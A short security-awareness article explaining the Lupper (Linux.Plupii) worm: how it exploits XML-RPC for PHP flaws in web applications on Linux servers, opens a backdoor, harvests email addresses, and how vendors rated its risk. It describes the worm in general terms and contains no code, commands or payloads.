Lupper Worm 101
Malicious coders are very persistent these days. Windows is no longer alone in being attacked, as they have recently learned to exploit systems such as the Mac OS X and Linux, platforms known for their high-level of security. Many of them have been virus programs that take advantage of vulnerabilities in XML-RPC for PHP, a widely used open-source component found in many web-based applications.
Applications vulnerable to the newer viral strains are b2evolution, Drupal, PHPGroupWare, PostNuke, Tiki Wiki, WordPress and Xoops. While most of these applications have been updated to address the vulnerabilities, un-patched Linux systems remain vulnerable to Linux.Plupii, more commonly termed as the Lupper worm.
How the Worm Functions
The Lupper worm spreads by exploiting Apache web servers using PHP/CGI scripts, a programming language known to be more vulnerable than others. This infection is said to be a variant of the Linux Slapper and BSD Scalper worms due to similar propagation techniques. It attacks a web server by transmitting malicious HTTP (Hypertext Transfer Protocol) requests to open ports. The worm downloads and executes itself when the targeted server is running vulnerable scripts at a particular URL. This is enabled by configurations that permit remote file downloads in PHP/CGI and external shell commands. It's most alarming function involves creating a backdoor on the compromised server. The worm then generates URLs, which initiates a scan to seek out other machines for infection. Additionally, the Lupper worm has the ability to harvest email addresses as well.
Protecting against the Lupper Worm
Lupper was spotted rather quickly and doesn't seem to be spreading at the rate of the Slapper worm. Being that worm exploits on the Linux system are rare in comparison to the Windows environment, security experts suggest that this malicious program is worth keeping an eye on. Representatives from McAfee state that Lupper's intent of infection is to form a global network of compromised machines based on the peer-to-peer communication principle. This creates a robust network capable of distributing DDoS (distributed denial-of-service) attacks and other exploits because of its remote command. The security vendor also fears that the worms ability to extract email addresses may lead to new methods of infection.
The good thing is that most large corporations aren't running applications scripted in PHP/CGI. What may pose a continuous threat are unofficial sites established from within an or outside of an organization and web hosting companies that use a variety of different scripts. Since the Lupper worm seems to use an IP-based method of propagation, it is less likely that it will locate servers using vulnerable scripts, limiting the chance of infection. This worm would be much more difficult to contain if it was distributed via infected hosts found in the results of a search engine, a common trait of Windows-based malware.
Security experts have recommended many ways to deal with this infection; one is to only grant trusted users access to an FTP server. Symantec Corporation reports the Lupper worm as having a medium level of damage and distribution rate. McAfee labeled it as a low-risk threat for both home and corporate users.